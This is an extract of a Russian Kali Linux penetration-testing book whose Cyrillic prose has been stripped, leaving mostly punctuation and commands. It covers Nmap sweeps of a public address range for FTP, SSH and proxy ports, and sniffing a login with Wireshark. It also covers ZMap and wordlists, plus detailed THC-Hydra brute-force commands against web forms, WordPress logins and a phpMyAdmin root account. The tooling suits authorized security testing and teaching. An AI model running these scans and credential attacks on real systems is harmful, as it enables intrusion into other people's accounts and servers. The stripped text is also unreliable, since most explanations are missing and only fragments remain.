Windows. , Kali 192.168.1.35
, .
: , /
Windows.
, Kali Windows.


. .
,
Linux. DNS ,
. .
IP Linux,
:
1| ifconfig
- . ,
. ,
. Linux , ,
, 512 .
1-1,3
. - ,
, 2 3.
.

52. NMAP Linux


Nmap ,
.
Linux, ,
. Nmap, ,
( IP)
, /,
,
, , .
.
. ,
, .
Nmap
, nmap .
Nmap Kali Linux
Nmap .

WebWare.biz 301
Kali Linux 2.0

Nmap CentOS
1| yum install nmap

Nmap Debian
1| apt-get install nmap

Nmap Ubuntu
1| sudo apt-get install nmap

Nmap
nmap.
:
1| nmap --help

,
.
nmap, .
.
.
, nmap
. Kali Linux ,
sudo. sudo, Kali
, sudo.

,

(
webware.biz). :
1| sudo nmap -sS [IP ] [ -]

WebWare.biz 302
Kali Linux 2.0

nmap ,
. ,
, .
.
1| sudo nmap -O --osscan-guess [IP ] [ -]

WebWare.biz 303
Kali Linux 2.0

, .
, VERSION
.
1| sudo nmap -sV [IP ] [ -]

WebWare.biz 304
Kali Linux 2.0

-, , -, SSH, FTP
, Nmap, .
193.106.148-153.1-255.
193.106.148.* 193.106.153.*,
*.*.*1 *.*.*255, .. 193.106.148.1-
255, 193.106.149.1-255, 193.106.150.1-255 ..
, -, -
, -, - 80, 8080 1080.
, - ,
.
1| nmap -sS -sV -vv -n -Pn -T5 193.106.148-153.1-255 -p80,8080,1080 -oG - | grep 'open'
, ,
.

( , )
WebWare.biz 305
Kali Linux 2.0

FTP
FTP 21 , ,
.
1| nmap -sS -sV -vv -n -Pn -T5 193.106.148-153.1-255 -p21 -oG - | grep 'open'

, .
SSH
SSH 22, .
1| nmap -sS -sV -vv -n -Pn -T5 193.106.148-153.1-255 -p22 -oG - | grep 'open'
:

WebWare.biz 306
Kali Linux 2.0

, (
), (,
FTP ,
, FTP ).
SSH .
, ,
,
. FTP,
, SFTP ( FTP ).

, .
.. /,
(65535).
,
ftp ( | grep 'ftp'), ssh ( | grep 'ssh') . . :
1| nmap -sS -sV -vv -n -Pn -T5 193.106.148.1-255 -p1-65535 -oG - | grep 'ftp'
.

Zenmap (GUI) Nmap


nmap .
- , Zenmap.
Nmap.

( , )
, .
, .
,
. , , .
, .

WebWare.biz 307
Kali Linux 2.0

( , )

( , )

Nmap
, , ,
FTP ?
Nmap,
. .
:
-,
. ,
,
-. ,
WebWare.biz 308
Kali Linux 2.0

, ,
phpMyAdmin . .
FTP, SSH . ,
FTP
, SSH.
.
, , -
, .
. ()
. : --,
, , -
. .

. .
, Armitage. :
, .
.
Armitage: Armitage:
Kali Linux.
?
VPS,
.
, .
Nmap ,

:
Nmap
BruteX:
THC-Hydra: ( )
Offensive Security ( Kali Linux)
Metasploit Exploitation Framework searchsploit

Armitage: Kali
Linux
FTP-Map: FTP-

:
SFTP Linux
ssh
VPS (VDS) Debian. : Apache,
PHP, MySQL
WebWare.biz 309
Kali Linux 2.0

fail2ban Apache HTTP


- Apache PHP ( Linux Windows)
- Apache mod_security mod_evasive
CentOS
ModSecurity (mod_security) Apache ( Windows)
Apache, MariaDB/MySQL PHP CentOS (LAMP)

53. Nmap
: https://nmap.org/man/ru/
Nmap ( ): https://nmap.org/nsedoc/index.html
Nmap ( ):
http://nmap.org/book/man.html
Nmap Nmap ( ):
http://nmap.org/book/toc.html
: http://webware.biz/?p=4540#5

54. - WireShark
( )
, ,
- ENTER, . ,
. -?? (,
) - HTTP
(PlainText), (
) . , -
-, HTTP . ,

(BGP ,
).
, , ,
HTTP.
, , , ,

.
, -.
. VirtualBox/VMWare/
.
: ,
.

WebWare.biz 310
Kali Linux 2.0

1. Wireshark
Kali Linux Wireshark
> Kali Linux > Top 10 Security Tools > Wireshark
Wireshark Capture > Interface
, , eth0,
wlan0.

, Start Wireshark .
, Capture > Start

2. POST
, Wireshark .
-, .
,
Wireshark. , .
, ,
, .

WebWare.biz 311
Kali Linux 2.0

Wireshark . ,
POST.
POST?
,
POST.
POST,
:
1| http.request.method == "POST"
. 1 POST.

( , )

3: POST
Follow TCP Steam

( , )

WebWare.biz 312
Kali Linux 2.0

, - :

log=Dimon&pwd=justfortest?
..
log=Dimon ( : Dimon)
pwd=justfortest (: justfortest)
, WebWare.biz .
WireShark

1. . ,
Wi-Fi , .
2. , , ,
. (
), ,
, . ,
.
.
, ,

WebWare.biz 313
Kali Linux 2.0

,
.
3. VPN,
.
4. SSL-.
: . : , ,
, - SSL-, ,
. :
( , , , -, - . .)
. !
, SSL-.
( ,
/ / ),
SSL- ( ,
). , , ,
400 . ,
SSL-.
- ,
SSL-,
. , , .

55. FTP-Map:
FTP-
Ftpmap FTP- ,
.

,
. FTP-Map /,
FTP . FTP-Map
.
: https://github.com/Hypsurus/ftpmap
FTP-Map Kali Linux
1| apt-get install automake autoconf
~/opt
1| cd ~/opt/
2| git clone git://github.com/Hypsurus/ftpmap
3| cd ftpmap/
4| autoreconf
5| ./configure
6| make
7| sudo make install

WebWare.biz 314
Kali Linux 2.0

FTP-Map
1| ftpmap -s [host] [OPTIONS]...

1| :
2| --scan, -S - FTP .
3| --server, -s <host> - FTP .
4| --port, -P <port> - FTP ( : 21).
5| --user, -u <user> - FTP ( : anonymous).
6| --password, -p <password> - FTP ( : NULL).
7| --execute, -x <cmd> - FTP .
8| --nofingerprint, -n - .
9| --login, -A - , .

WebWare.biz 315
Kali Linux 2.0

10| --force, -F - .
11| --output, -o <file> - .
12| --list, -L <path> - FTP .
13| --delete <path> - / .
14| --last-modified, -m <file> -

15|
16| Fuzzer:
17| --fuzzer, -f - Fuzzer.
18| --fuzzerlength,-b <> - . ( : 256)
19| --fuzzer-nologin, -l - .
20|
21| :
22| --version, -v - .
23| --help, -h - .

, ( hypsurus@mail.ru )

, .

56. ZMap IPv4


45
ZMap ,
. , ZMap
IPv4 45 .
PF_RING, ZMap IPv4 5 .

. ZMap
. ,
. ZMap GNU/Linux
TCP SYN ICMP .
ZMap 1300 Nmap
.
: https://github.com/zmap/zmap

ZMap
ZMap, , 64- .
600 . CMake 2.8.12 .

WebWare.biz 316
Kali Linux 2.0

ZMap
Fedora 19+
:
1| yum install zmap
Archlinux, , AUR
: https://aur.archlinux.org/packages/zmap/

ZMap
ZMap Kali Linux
Kali Linux . :
1| CMake 2.8.12 or higher is required. You are running version 2.8.9
.. CMake 2.8.12 , Kali CMake 2.8.9.
ZMap GMP
, gengetopt libpcap. ZMap flex byacc.
Debian :
1| sudo apt-get install build-essential cmake libgmp3-dev gengetopt libpcap-dev flex byacc
libjson-c-dev pkg-config
RHEL- Fedora :
1| sudo yum install gmp gmp-devel gengetopt libpcap-devel flex byacc
https://github.com/zmap/zmap
1| git clone https://github.com/zmap/zmap.git
, , 3 :
1| cmake [-DWITH_REDIS=ON] [-DWITH_JSON=ON] [-DENABLE_DEVELOPMENT=ON] ./
2| make
3| sudo make install
Linux Mint , :
1| -- Install configuration: ""
2| CMake Error at InstallConfFiles.cmake:2 (file):
3| file COPY cannot find
4| "/home/mial/opt/zmap.git/tags/v2.1.0-RC2/$./conf/blacklist.conf".
5| Call Stack (most recent call first):
6| cmake_install.cmake:36 (include)
7|
8| Makefile:66: install
9| make: *** [install] 1

WebWare.biz 317
Kali Linux 2.0

, ,
InstallConfFiles.cmake. :
1| if(NOT EXISTS "/etc/zmap/blacklist.conf")
2| file(COPY "${PROJECT_SOURCE_DIR}/conf/blacklist.conf" DESTINATION
"${CONFIG_DESTINATION}/blacklist.conf")
3| endif()
4|
5| if(NOT EXISTS "/etc/zmap/zmap.conf")
6| file(COPY "${PROJECT_SOURCE_DIR}/conf/zmap.conf" DESTINATION
"${CONFIG_DESTINATION}/zmap.conf")
7| endif()
:
1| if(NOT EXISTS "/etc/zmap/blacklist.conf")
2| file(COPY "./conf/blacklist.conf" DESTINATION "${CONFIG_DESTINATION}/blacklist.conf")
3| endif()
4|
5| if(NOT EXISTS "/etc/zmap/zmap.conf")
6| file(COPY "./conf/zmap.conf" DESTINATION "${CONFIG_DESTINATION}/zmap.conf")
7| endif()
.. , -
${PROJECT_SOURCE_DIR}, ,
: .
.
ZMap
ZMap ,
:
1| Jul 08 17:02:45.814 [FATAL] recv: could not open device eth0: eth0: You don't have
permission to capture on that device (socket: Operation not permitted)
.
10000 80
10 :
1| zmap --bandwidth=10M --target-port=80 --max-targets=10000 --output-file=results.csv
, :
1| zmap -B 10M -p 80 -n 10000 -o results.csv
, ZMap
CIDR. , 10.0.0.0/8 192.168.0.0/16
80 :
1| zmap -p 80 -o results.csv 10.0.0.0/8 192.168.0.0/16
ZMap .

WebWare.biz 318
Kali Linux 2.0

8. .
57. : ,
,
(
). , , .
, , .
.
. ,
, .
,
, , .
:
.
, .
.
.
:
,
,
. ,
. .. IP
,
. ,
;
Wi-Fi ( ),
,
, , ;
, , ,
, .
, : .
.
- , (, ) :
1| wc -l _
, , Kali Linux.
, , .



SSH, FTP, , HTTP ,
. .
THC-Hydra, Medusa, Patator, BruteX.
WebWare.biz 319
Kali Linux 2.0

BruteX (,
).
http://download.openwall.net/pub/wordlists/.
,
, , Patator.
:
1| wget https://raw.githubusercontent.com/1N3/BruteX/master/namelist.txt

:
1| wget https://raw.githubusercontent.com/1N3/BruteX/master/password.lst

Linux:
1| wget https://raw.githubusercontent.com/1N3/BruteX/master/simple-users.txt

nmap, ,
:
1| /usr/share/nmap/nselib/data/passwords.lst

Metasploit:
1| /usr/share/wordlists/metasploit-jtr/common_roots.txt
2| /usr/share/wordlists/metasploit-jtr/password.lst
.

, ,
.
BruteX:
1| wget https://raw.githubusercontent.com/1N3/BruteX/master/dirbuster.txt
2| wget https://raw.githubusercontent.com/1N3/BruteX/master/dirbuster-ext.txt
( )

dirb DIRB.
.
:
1| /usr/share/dirb/wordlists
2| /usr/share/dirbuster/wordlists

WebWare.biz 320
Kali Linux 2.0

:
1| root@WebWare:~# tree /usr/share/wordlists/dirb*
2| /usr/share/wordlists/dirb
3| big.txt
4| catala.txt
5| common.txt
6| euskera.txt
7| extensions_common.txt
8| indexes.txt
9| mutations_common.txt
10| others
11| best1050.txt
12| best110.txt
13| best15.txt
14| names.txt
15| small.txt
16| spanish.txt
17| stress
18| alphanum_case_extra.txt
19| alphanum_case.txt
20| char.txt
21| doble_uri_hex.txt
22| test_ext.txt
23| unicode.txt
24| uri_hex.txt
25| vulns
26| apache.txt
27| axis.txt
28| cgis.txt
29| coldfusion.txt
30| domino.txt
31| fatwire_pagenames.txt
32| fatwire.txt
33| frontpage.txt
34| hpsmh.txt

WebWare.biz 321
Kali Linux 2.0

35| hyperion.txt
36| iis.txt
37| iplanet.txt
38| jboss.txt
39| jersey.txt
40| jrun.txt
41| netware.txt
42| oracle.txt
43| ror.txt
44| sap.txt
45| sharepoint.txt
46| sunas.txt
47| tests.txt
48| tomcat.txt
49| vignette.txt
50| weblogic.txt
51| websphere.txt
52| /usr/share/wordlists/dirbuster
53| apache-user-enum-1.0.txt
54| apache-user-enum-2.0.txt
55| directories.jbrofuzz
56| directory-list-1.0.txt
57| directory-list-2.3-medium.txt
58| directory-list-2.3-small.txt
59| directory-list-lowercase-2.3-medium.txt
60| directory-list-lowercase-2.3-small.txt
61|
62| 3 directories, 54 files
, , ,
DIRB.

Wi-Fi
rockyou .
, Wi-Fi.
Kali, :
1| /usr/share/wordlists/rockyou.txt.gz

WebWare.biz 322
Kali Linux 2.0

:
1| /usr/share/wordlists/fern-wifi
Wi-Fi, , - .
(, )
Kali, :
1| /usr/share/sqlmap/txt/wordlist.txt

Metasploit
Metasploit .
, :
1| root@WebWare:~# tree /usr/share/wordlists/metasploit
2| /usr/share/wordlists/metasploit
3| av-update-urls.txt
4| burnett_top_1024.txt
5| burnett_top_500.txt
6| cms400net_default_userpass.txt
7| db2_default_pass.txt
8| db2_default_userpass.txt
9| db2_default_user.txt
10| default_pass_for_services_unhash.txt
11| default_userpass_for_services_unhash.txt
12| default_users_for_services_unhash.txt
13| dlink_telnet_backdoor_userpass.txt
14| hci_oracle_passwords.csv
15| http_default_pass.txt
16| http_default_userpass.txt
17| http_default_users.txt
18| http_owa_common.txt
19| idrac_default_pass.txt
20| idrac_default_user.txt
21| ipmi_passwords.txt
22| ipmi_users.txt
23| joomla.txt
24| keyboard-patterns.txt
25| malicious_urls.txt

WebWare.biz 323
Kali Linux 2.0

26| multi_vendor_cctv_dvr_pass.txt
27| multi_vendor_cctv_dvr_users.txt
28| namelist.txt
29| oracle_default_hashes.txt
30| oracle_default_passwords.csv
31| oracle_default_userpass.txt
32| postgres_default_pass.txt
33| postgres_default_userpass.txt
34| postgres_default_user.txt
35| root_userpass.txt
36| rpc_names.txt
37| rservices_from_users.txt
38| sap_common.txt
39| sap_default.txt
40| sap_icm_paths.txt
41| sensitive_files.txt
42| sensitive_files_win.txt
43| sid.txt
44| snmp_default_pass.txt
45| tftp.txt
46| tomcat_mgr_default_pass.txt
47| tomcat_mgr_default_userpass.txt
48| tomcat_mgr_default_users.txt
49| unix_passwords.txt
50| unix_users.txt
51| vnc_passwords.txt
52| vxworks_collide_20.txt
53| vxworks_common_20.txt
54|
55| 0 directories, 51 files
:
1| /usr/share/wordlists/metasploit


()
.
WebWare.biz 324
Kali Linux 2.0

Router Scan v2.52 by StasM ,


- . .
. auth_basic.txt
auth_digest.txt ( HTTP ).
, ,
Linux . , , . .
.
.
, . ,
.
.

58. PW-Inspector:

. ))
. .
, ( ),
, , :
, . ,
, ,
. , Wi-Fi 8
63. .
, ,
. , ,
.
PW-Inspector , .
:
1| pw-inspector [-i ] [-o ] [-m ] [-M ] [-c ] -l -u -n -p -s

1| :
2| -i , ( :
)
3| -o , ( :
)
4| -m
5| -M
6| -c (
: )
7| Sets:
8| -l (a,b,c,d ..)

WebWare.biz 325
Kali Linux 2.0

9| -u (A,B,C,D ..)

10| -n (1,2,3,4 ..)


11| -p ( -l/-n/-p, e.g. $,!,/,(,* ..)
12| -s
, 0
. : , 0,
.
:
1| cat dictionary.txt | pw-inspector -m 6 -c 2 -n > passlist.txt
2| cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt

59. THC-Hydra:
( )
hydra ,

. , hydra
. ,
hydra, BruteX.
, , hydra,

, .
, BruteX:
.
THC-Hydra .
Linux, Windows/Cygwin,
Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) OSX. Kali
Linux .
: Asterisk, AFP, Cisco AAA,
Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET,
HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD,
HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID,
Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB,
SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 v2), SSHKEY, Subversion, Teamspeak
(TS2), Telnet, VMware-Auth, VNC XMPP.
. . .
Hydra:
1| hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE
[-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvVd46]
[service://server[:PORT][/OPT]]

WebWare.biz 326
Kali Linux 2.0

? )) ,
THC-Hydra,
.
hydra:
1| -R
/
2| -S SSL
3| -s ,

4| -l -L (),

5| -p -P ,

6| -x ::_ , "-x
-h"
7| -e nsr "n" , "s"
/ "r"

8| -u ,
(!
-x)
9| -C ":"
, -L/-P
10| -M ,
, ':'
11| -o /

12| -f / -F , / (-M:
-f , -F )
13| -t
( , : 16)
14| -w / -W (32 ) /

15| -4 / -6 IPv4 ( ) IPv6

16| -v / -V / -d / +
/
17| -q
18| -U
19| server : DNS, IP 192.168.0.0/24 (
-M)
20| service (
)

WebWare.biz 327
Kali Linux 2.0

21| OPT
(-U
)

hydra

Hydra
THC-Hydra /. - .
: ,
, . , .
hydra
dpl4hydra.sh. , , .
dpl4hydra.sh Kali Linux,
( - Kali ):
1| wget https://raw.githubusercontent.com/vanhauser-thc/thc-hydra/master/dpl4hydra.sh
:
1| touch /usr/local/etc/dpl4hydra_full.csv /usr/local/etc/dpl4hydra_local.csv
:
1| sh dpl4hydra.sh refresh
:
1| sh dpl4hydra.sh all
.
, , D-Link, :
1| sh dpl4hydra.sh d-link

WebWare.biz 328
Kali Linux 2.0

, D-Link,
- - . ,
.
Hydra
, Linux (GTK gui),
:
1| xhydra

Hydra
:
, ://
1| hydra [ ] ://:/

, ,
, **
:
1| hydra [ ] [-s ]
, ,
SSL, ..
, , , ftp, smtp, http-get

,
TARGET is the target you want to attack
,

:
1. : IP DNS
2. :
3. : ( )

telnet, ,
. , ,
.
, :
1| hydra -U
:
1| hydra -U smtp

WebWare.biz 329
Kali Linux 2.0


!
, hydra ,

SSL ( "-S"),
SSL.
"://", [ ],
IPv6 CIDR ("192.168.0.0/24"):
1| hydra [ ] ftp://[192.168.0.0/24]/
2| hydra [ ] -6 smtp://[2001:db8::1]/NTLM
, hydra IPv4!
IPv6 "-6".
IPv6.
,
://, ( ):
1| hydra [ ] -M targets.txt ftp
, ":<>"
, :
1| foo.bar.com
2| target.com:21
3| unusual.port.com:2121
4| default.used.here.com
5| 127.0.0.1
6| 127.0.0.1:2121

, IPv6,
-6 IPv6 (!) :
1| foo.bar.com
2| target.com:21
3| [fe80::1%eth0]
4| [2001::1]
5| [2002::2]:8080
6| [2a01:24a:133:0:00:123:ff:1a]

Hydra
, .
-l -p , hydra
/ .

WebWare.biz 330
Kali Linux 2.0

-L -P ,
:
1| hydra -l admin -p password ftp://localhost/
2| hydra -L default_logins.txt -p test ftp://localhost/
3| hydra -l admin -P common_passwords.txt ftp://localhost/
4| hydra -L logins.txt -P passwords.txt ftp://localhost/

, ,
"-e".
"-e" :
s
n
r

, ,
"-e sn".
-p/-P :
,
, :
1| admin:password
2| test:test
3| foo:bar

.
dpl4hydra.sh (
hydra).
-C, ,
-l/-L/-p/-P ( -e nsr ).
:
1| hydra -C default_accounts.txt ftp://localhost/

, -x ( -p/-P/-C):
-x _:_:_
'a' , 'A'
, '1' , .
:
-x 1:3:a 1 3 ,

WebWare.biz 331
Kali Linux 2.0

-x 2:5:/ 2 5 ,

-x 5:8:A1 5 8 ,

:
1| hydra -l ftp -x 3:3:a ftp://localhost/


( ) -m,
.
, !
, :
1| hydra -U <>

:
1| hydra -U http-post-form

-m
:///.
( ):
1| hydra -l test -p test -m PLAIN 127.0.0.1 imap
2| hydra -l test -p test 127.0.0.1 imap PLAIN
3| hydra -l test -p test imap://127.0.0.1/PLAIN

/
hydra Control-C, ,
"hydra.restore"
. 5 .
: hydra.restore
( little indian big indian solaris aix)
/
HYDRA_PROXY_HTTP (
http/www!)
:
1| HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"

WebWare.biz 332
Kali Linux 2.0

HYDRA_PROXY
/ - CONNECT.
, :
1| HYDRA_PROXY=[http|socks4|socks5]://proxy_addr:proxy_port

:
1| HYDRA_PROXY=http://proxy.anonymizer.com:8000

,
HYDRA_PROXY_AUTH:
1| HYDRA_PROXY_AUTH="the_login:the_password"


-u
!
uniq,
! :
1| cat words.txt | sort | uniq > dictionary.txt

, (
6 ,
. ., pw-
inspector, hydra
:
1| cat dictionary.txt | pw-inspector -m 6 -c 2 -n > passlist.txt

hydra
,
. , .
POP3 FTP.
-t ! (
)

hydra
SuSE Linux 7.2 "-C FILE", 295
(294 , 1 ).
( "1 " ) :

WebWare.biz 333
Kali Linux 2.0

1|
2| SERVICE 1 4 8 16 32 50 64 100 128
3| --------------------------------------------------------------------------------------------------------------
4| telnet 23:20 5:58 2:58 1:34 1:05 0:33 0:45* 0:25* 0:55*
5| ftp 45:54 11:51 5:54 3:06 1:25 0:58 0:46 0:29 0:32
6| pop3 92:10 27:16 13:56 6:42 2:55 1:57 1:24 1:14 0:50
7| imap 31:05 7:41 3:51 1:58 1:01 0:39 0:32 0:25 0:21
8|
9| (*) telnet
64 128! , 128 , ,
28 97 !
10| ...
11|
12|
13| ():
14| 295 74 38 19 10 6 5 3 3
15|
16| (
):
17| telnet 4
18| ftp 6
19| pop3 1
20| imap 3

60. - Hydra (
Hydra)
: THC-Hydra: .
, . .
Hydra.
-.
- , -
. Hydra. ,
, , Hydra
( ) .

Hydra .

WebWare.biz 334
Kali Linux 2.0

http-post-form http-get-form

. URL
.
":",
.
(: ,
"\:", "\" "\\".)
:
1| <url>:< >:< >[:<>[:<>]

URL , GET POST.

POST/GET ( , . .)
"^USER^" "^PASS^"
( ).

, ** ( ).
,
"F=", ,
"S=".
. -,
, !
:
C=/page/uri
(h|H)=My-Hdr\: foo HTTP

^USER^ ^PASS^ !
: 'h'
, Hydra .
'H' ,

, (:) ,
(\).
, ,
( ).
,
,
hydra .

WebWare.biz 335
Kali Linux 2.0

:
1| "/login.php:user=^USER^&pass=^PASS^:incorrect"
2|
3| "/login.php:user=^USER^&pass=^PASS^&colon=colon\:escape:S=authlog=.*success"
4|
5| "/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed"
6|
7| "/:user=^USER&pass=^PASS^:failed:H=Authorization\: Basic dT1w:H=Cookie\:
sessid=aaaa:h=X-User\: ^USER^"
8|
9| "/exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F<target>%2Fexchange&flag
s=0&username=<domain>%5C^USER^&password=^PASS^&SubmitCreds=x&trusted=0:rea
son=:C=/exchweb"

Hydra :
1| hydra -L logins.txt -P passwords.txt http-post-form://example.org/ -m
"/signin.php:login_username=^USER^&login_password=^PASS^:Please login"

:
-L logins.txt -P passwords.txt ,
,
.
http-post-form , , ,
(form) (http), POST (post).
http-post-form http-get-form ,
GET.
example.org
-m , ,
( http-post-form)
"/signin.php:login_username=^USER^&login_password=^PASS^:Please login"
, ,

/signin.php , ,

login_username=^USER^&login_password=^PASS^ ,
. . ^USER^
, . ^PASS^
.
login_username login_password ,
, .

WebWare.biz 336
Kali Linux 2.0

Please login , hydra


. ,
,
. ,
.
.
, , , .
.
Hydra
.
.
.
http://example.org/. :
1| <form method="post" enctype="application/x-www-form-urlencoded" action="?signin"
style="margin: 10px;">
2| <table>
3| <tr>
4| <td><label></label></td>
5| <td><input type="text" style="font-size: 11px" name="login_username" size="10"
value="" onfocus="if (this.value == '') this.value = '';" /></td>
6| </tr>
7|
8| <tr>
9| <td><label></label></td>
10| <td><input type="password" style="font-size: 11px" name="login_password" size="10"
/></td>
11| </tr>
12|
13| <tr>
14| <td><label><input type="checkbox" name="cookieuser" value="1" checked="checked"
/>?</label></td>
15| <td><input type="submit" value="" title="
, , '', ."
/></td>
16| </tr>
17| </table>
18| </form>
hydra .

method="post"

WebWare.biz 337
Kali Linux 2.0

http-post-form, , :
1| hydra -l 111111 -p 222222 http-post-form://example.org

111111 222222 (
)
http-post-form ( )
example.org ( ).
, ,

"______:___
:____"
, ?signin
:
1| /?signin

: login_username, login_password, cookieuser


login_username , . . ^USER^,
login_username=^USER^, login_password , . .
^PASS^ login_password=^PASS^, cookieuser,
cookieuser=1, &:
1| login_username=^USER^&login_password=^PASS^&cookieuser=1

, . ,
.
.
: , ,
, , . . .
,
-. ( ) .
.. , :
1| /?signin
2| login_username=^USER^&login_password=^PASS^&cookieuser=1
3|

, :
1| /?signin:login_username=^USER^&login_password=^PASS^&cookieuser=1:

WebWare.biz 338
Kali Linux 2.0

-m. ..
:
1| hydra -l 111111 -p 222222 http-post-form://example.org -m
"/?signin:login_username=^USER^&login_password=^PASS^&cookieuser=1:
"
.
, hydra
, . :

Hydra
-d
1| hydra -l 111111 -p 222222 http-post-form://example.org -m
"/?signin:login_username=^USER^&login_password=^PASS^&cookieuser=1:
" -d

, . ,
,

, , .
. ,
-
.
, . . ,
, , :

WebWare.biz 339
Kali Linux 2.0

!, ,
, . . Set-Cookie.
, .
S=, hydra, , ,
:
1| hydra -l 111111 -p 222222 http-post-form://example.org -m
"/?signin:login_username=^USER^&login_password=^PASS^&cookieuser=1:S=Set-Cookie"

.. , , hydra ,
. , .
, ,
.

WebWare.biz 340
Kali Linux 2.0

WordPress c hydra

.
Chrome ( Firefox -).
, .
http://notwebware.biz/wp-login.php.
Google Chrome

Network.
.
:

, wp-login.php
POST. . Form Data view source:

:
1| log=111111&pwd=222222&rememberme=forever&wp-
submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8&redirect_to=http%3A%2F%2Fwebwa
re.biz%2Fwp-admin%2F&testcookie=1

111111 222222,
^USER^ ^PASS^:

WebWare.biz 341
Kali Linux 2.0

, :
1| log=^USER^&pwd=^PASS^&rememberme=forever&wp-
submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8&redirect_to=http%3A%2F%2Fwebwar
e.biz%2Fwp-admin%2F&testcookie=1

General, Request URL:

:
1| Request URL:http://webware.biz/wp-login.php
.. wp-login.php
:
1| Request Method:POST
,
. , ,
. HTML -
, login_error.
WordPress hydra:
1| hydra -l 111111 -p 222222 http-post-form://notwebware.biz -m "/wp-
login.php:log=^USER^&pwd=^PASS^&rememberme=forever&wp-
submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8&redirect_to=http%3A%2F%2Fwebwar
e.biz%2Fwp-admin%2F&testcookie=1:login_error"
. . ,
503.
.

WebWare.biz 342
Kali Linux 2.0

phpMyAdmin c hydra
. ,
phpMyAdmin:
1| hydra -l root -e n http-post-form://192.168.1.33 -m
"/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^&serv
er=1:S=information_schema"
.
phpMyAdmin.
, ClickJacking,
( ). phpMyAdmin
:
1| /* Prevent against ClickJacking by disabling framing */
2| if (! $GLOBALS['cfg']['AllowThirdPartyFraming']) {
3| header(
4| 'X-Frame-Options: DENY'
5| );
6| }
.. phpMyAdmin . ,
( )
.
.. (, ,
)
http-get http-post

: "/secret" "http://bla.com/foo/bar" "https://test.com:8080/members"

61. Crunch :

Crunch
Crunch ,
. Crunch
.
:
crunch (WordList) ,



()

WebWare.biz 343
Kali Linux 2.0


,
-l , @,% ^
-d , man-

unicode
, WordList ( )
. .
:
1. Dictionary attack
. .

. 100%
.
2. Brute Force Attack
, 100%
.
( ).
3. Hybrid Attack
, .
4. Syllable Attack
brute force attack dictionary attack.
5. Rule-Based Attack
, . ,
.
crunch
:
crunch <-> <-> [ ]
:
1| crunch 3 7 abcdef

3 7 , 'abcdef'
.
:
1| crunch <-> < > [-f < charset.lst> -
-] [-o wordlist.txt START] [-t [FIXED]@@@@] [-s startblock]

WebWare.biz 344
Kali Linux 2.0

@
,
%
^ , 33.
:
1| crunch 1 1 -t ^

crunch
> Kali Linux > Password Attacks > Offline Attacks > crunch
:
1| crunch
.
crunch <min> <max> <charset> -t <pattern> o <filename.lst>
,
min =
max =
charset = , . :
abcd 123455
pattern = . 98*******,
.. .
, 10 , 10 ,
abcd987 abc@@@@@@@
.
:
1| crunch 10 10 abcd987 -t abc@@@@@@@ -o /root/Desktop/file.txt
823543 .

WebWare.biz 345
Kali Linux 2.0

crunch
1
1| crunch 1 8
Crunch , a zzzzzzzz
2
1| crunch 1 6 abcdefg
Crunch , abcdefg
a gggggg
3
1| crunch 1 6 abcdefg\
. crunch ,
, \.
\, "abcdefg ".
Crunch , abcdefg ,
a, .
4
1| crunch 1 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt
Crunch mixalpha-numeric-all-space charset.lst
wordlist.txt.
a " "
5
1| crunch 8 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt -t @@dog@@@ -s
cbdogaaa
Crunch ,
mixalpha-number-all-space character set charset.lst
wordlist.txt. cbdogaaa " dog "

62. BruteX:

BruteX , (
). ,

. ?
NMap'
. , , FTP, SSH
Hydra . .
, . .
. BruteX , ,
. ( brutex-massscan).

WebWare.biz 346
Kali Linux 2.0

.. BruteX , :

DNS
-
-


BruteX:
1| git clone https://github.com/1N3/BruteX.git
BruteX:
1| ./brutex target
target IP.

:
NMap
Hydra
Wfuzz
SNMPWalk
DNSDict
WebWare.biz 347
Kali Linux 2.0

brutex-massscan IP/
targets.txt.

WebWare.biz 348